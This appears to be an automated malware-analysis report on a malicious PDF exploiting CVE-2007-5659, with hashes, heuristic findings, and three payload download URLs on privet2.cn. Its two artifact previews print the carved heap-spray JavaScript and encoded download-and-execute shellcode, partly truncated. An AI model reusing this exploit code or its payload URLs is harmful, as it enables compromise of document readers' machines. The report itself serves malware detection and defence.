PDF malware analysis — malicious · 7bebb51a0321992e

MALICIOUS

PDF

7.5 KB

MD5: 68d72b18cd602b9b305c59ba381f0b6b SHA-1: 24593598a3444f3a21a382e40508d9c10c9b700d SHA-256: 7bebb51a0321992ef3d53a056ce0f04e94440ab0c792957b0840465d62313368

290 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file exploits CVE-2007-5659 using embedded JavaScript. The script is designed to download and execute a second-stage payload from one of the provided URLs. The use of JavaScript and the embedded download URLs strongly indicate a malicious intent to compromise the user's system.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://privet2.cn/arend_nt/getexe.php?spl=pdf_email Referenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_prntfReferenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_icnReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js` `580631edd9605d991f9d25996a52be49ec9225e4114f80374adab594db206cdb`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	6175 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var DXlILKtRzfF3FRZETOaym = new Array(); var Knjjc5VLT5I2qaNAToA95; var lave = eval; function OOVmcyACxwHkg1NlWiFa2(mQbeb6SmEWzc3lE2wRyti, TZj7KFpZqqqHSUtXxflUf) { while(mQbeb6SmEWzc3lE2wRyti.length * 2 < TZj7KFpZqqqHSUtXxflUf) { mQbeb6SmEWzc3lE2wRyti += mQbeb6SmEWzc3lE2wRyti; } mQbeb6SmEWzc3lE2wRyti = mQbeb6SmEWzc3lE2wRyti.substring(0, TZj7KFpZqqqHSUtXxflUf / 2); return mQbeb6SmEWzc3lE2wRyti; } function tWQcXN4WGmFpVMAkCka3a(zV6l33QnW7B3Xnaur7AdM) { if(zV6l33QnW7B3Xnaur7AdM == 0) { var J9jAtvuUyUMTZ8VcYJ9eV = 0x0c0c0c0c; var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C"); } else if(zV6l33QnW7B3Xnaur7AdM == 1) { J9jAtvuUyUMTZ8VcYJ9eV = 0x30303030; var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066"); } else if(zV6l33QnW7B3Xnaur7AdM == 2) { var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E"); } var sOnq1M001eLCx8I8zYuFo = 0x400000; var BDDg7XzyMfIkS9loIupwF = RBIm6AsFnFFvyPptJJrof.length * 2; var TZj7KFpZqqqHSUtXxflUf = sOnq1M001eLCx8I8zYuFo - (BDDg7XzyMfIkS9loIupwF + 0x38); var mQbeb6SmEWzc3lE2wRyti = unescape("%u9090%u9090"); mQbeb6SmEWzc3lE2wRyti = OOVmcyACxwHkg1NlWiFa2(mQbeb6SmEWzc3lE2wRyti, TZj7KFpZqqqHSUtXxflUf); var duMK2MswbgnouTvSTto9C = (J9jAtvuUyUMTZ8VcYJ9eV - 0x400000) / sOnq1M001eLCx8I8zYuFo; for(var ibKKQdFFaUHUrcWEVTqBG = 0; ibKKQdFFaUHUrcWEVTqBG < duMK2MswbgnouTvSTto9C; ibKKQdFFaUHUrcWEVTqBG++) { DXlILKtRzfF3FRZETOaym[ibKKQdFFaUHUrcWEVTqBG] = mQbeb6SmEWzc3lE2wRyti + RBIm6AsFnFFvyPptJJrof; } } function l7kaZDUNLgxx2INeXcE3u() { var NuXF93iyEzdLjEuxiHJPF = 0; var RQXd66GK8B43iIBl2Az1n = app ... (truncated)
`generic_stage_recovery_000.js` `a39657b5066a19e2502d11ac46d2ca41303ea28057045ce9d6ffdfb516330d2c`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	6171 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var DXlILKtRzfF3FRZETOaym = new Array(); var Knjjc5VLT5I2qaNAToA95; var lave = eval; function OOVmcyACxwHkg1NlWiFa2(mQbeb6SmEWzc3lE2wRyti, TZj7KFpZqqqHSUtXxflUf) { while(mQbeb6SmEWzc3lE2wRyti.length * 2 < TZj7KFpZqqqHSUtXxflUf) { mQbeb6SmEWzc3lE2wRyti += mQbeb6SmEWzc3lE2wRyti; } mQbeb6SmEWzc3lE2wRyti = mQbeb6SmEWzc3lE2wRyti.substring(0, TZj7KFpZqqqHSUtXxflUf / 2); return mQbeb6SmEWzc3lE2wRyti; } function tWQcXN4WGmFpVMAkCka3a(zV6l33QnW7B3Xnaur7AdM) { if(zV6l33QnW7B3Xnaur7AdM == 0) { var J9jAtvuUyUMTZ8VcYJ9eV = 0x0c0c0c0c; var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C"); } else if(zV6l33QnW7B3Xnaur7AdM == 1) { J9jAtvuUyUMTZ8VcYJ9eV = 0x30303030; var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066"); } else if(zV6l33QnW7B3Xnaur7AdM == 2) { var RBIm6AsFnFFvyPptJJrof = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E"); } var sOnq1M001eLCx8I8zYuFo = 0x400000; var BDDg7XzyMfIkS9loIupwF = RBIm6AsFnFFvyPptJJrof.length * 2; var TZj7KFpZqqqHSUtXxflUf = sOnq1M001eLCx8I8zYuFo - (BDDg7XzyMfIkS9loIupwF + 0x38); var mQbeb6SmEWzc3lE2wRyti = unescape("%u9090%u9090"); mQbeb6SmEWzc3lE2wRyti = OOVmcyACxwHkg1NlWiFa2(mQbeb6SmEWzc3lE2wRyti, TZj7KFpZqqqHSUtXxflUf); var duMK2MswbgnouTvSTto9C = (J9jAtvuUyUMTZ8VcYJ9eV - 0x400000) / sOnq1M001eLCx8I8zYuFo; for(var ibKKQdFFaUHUrcWEVTqBG = 0; ibKKQdFFaUHUrcWEVTqBG < duMK2MswbgnouTvSTto9C; ibKKQdFFaUHUrcWEVTqBG++) { DXlILKtRzfF3FRZETOaym[ibKKQdFFaUHUrcWEVTqBG] = mQbeb6SmEWzc3lE2wRyti + RBIm6AsFnFFvyPptJJrof; } } function l7kaZDUNLgxx2INeXcE3u() { var NuXF93iyEzdLjEuxiHJPF = 0; var RQXd66GK8B43iIBl2Az1n = app ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.